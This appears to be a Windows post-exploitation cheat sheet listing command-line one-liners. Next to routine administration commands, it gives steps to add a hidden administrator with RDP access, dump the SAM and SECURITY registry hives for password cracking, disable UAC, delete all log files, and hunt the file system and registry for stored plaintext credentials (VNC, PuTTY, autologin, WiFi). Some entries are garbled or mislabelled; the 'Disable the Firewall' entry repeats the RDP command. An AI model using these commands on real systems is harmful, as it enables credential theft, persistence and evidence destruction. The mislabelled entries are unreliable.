Windows

Add Admin User w/ RDP

net user <username> <password> /ADD
net localgroup administrators <username> /ADD
net localgroup "Remote Desktop Users" username /ADD

Remove User

net user badaccount /del

Tasks / Services

Start or stop a service

net start|stop servicename

View the currently running tasklist

tasklist

Kill a task by name

task kill /F /IM task.exe

Kill a task by PID

taskkill /PID PID /F

Base64 encoding / decoding

base64 encodecertutil -encode inputfile outputfile
base64 decode
cmd certutil -decode inputfile outputfile

Dump passwords via reg.exe

reg.exe save hklm\sam c:\sam_backup reg.exe save hklm\security c:\security_backup reg.exe save hklm\system c:\system

Security settings

    Allow RDPreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    Disable UACreg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system reg setval -v EnableLUA -d 0 -t REG_DWORD -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system
    Refresh policiesgpupdate /force
    Disable the Firewallreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Services status

sc queryex type= service state= all
netstat -ano

Start & stop a service:

sc start <SERVICE NAME>
sc stop <SERVICE NAME>

Reading values from registry

C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

Interesting files

%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts

List logs

wevtutil el

Delete Logs

del \*.log /a /s /q /f

Scheduled Tasks

schtasks /query /fo LIST /v

Installed Software

wmic product get name /value

Uninstall Software

wmic product where name="<NAME>" call uninstall /INTERACTIVE:OFF

Search for Keywords (e.g *pass)

dir /s *pass* == *key* == *vnc* == *.config*

The above also looks for key, vnc and config.

Only in certain files…

findstr /si pass *.xml *.ini *.txt

Grep Registries…

reg query HKLM /f pass /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s

WiFi Clear Text Passwords

Find AP SSID

netsh wlan show profile

Interesting Registries

VNC

reg query "HKCU\Software\ORL\WinVNC3\Password" [VNC]

Windows autologin

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" [Windows]

SNMP Paramters

reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" [SNMP PARAMS]

Putty

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" [Putty Plaintext Credentials]

Search for password in registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s